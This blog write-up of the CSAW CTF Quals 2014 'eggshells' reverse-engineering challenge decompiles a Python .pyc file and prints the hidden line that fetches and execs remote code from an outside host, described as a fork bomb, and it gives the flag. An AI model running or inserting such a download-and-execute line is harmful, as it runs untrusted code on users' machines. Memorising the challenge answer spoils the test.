CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link of the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it but when you finally see the result it makes some sense to you 🙂

First when you unzip the file you get two directories named as “eggshells-master” and “__MACOSX”  here are the screenshots of the directories of the both the folders.

Screenshot from 2014-10-07 19:09:00

Screenshot from 2014-10-07 20:50:32

The source code of all other files except the utilys.pyc file which is a python compiled file you can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ) which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2) or what ever which can decompile python 2.7 file 🙂

If you decompile the file here is the code that you get:

exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()

Don’t be in a hurry and just run the code as it is a fork bomb 🙂

Screenshot from 2014-10-07 21:50:31

here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂


Feel free to comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s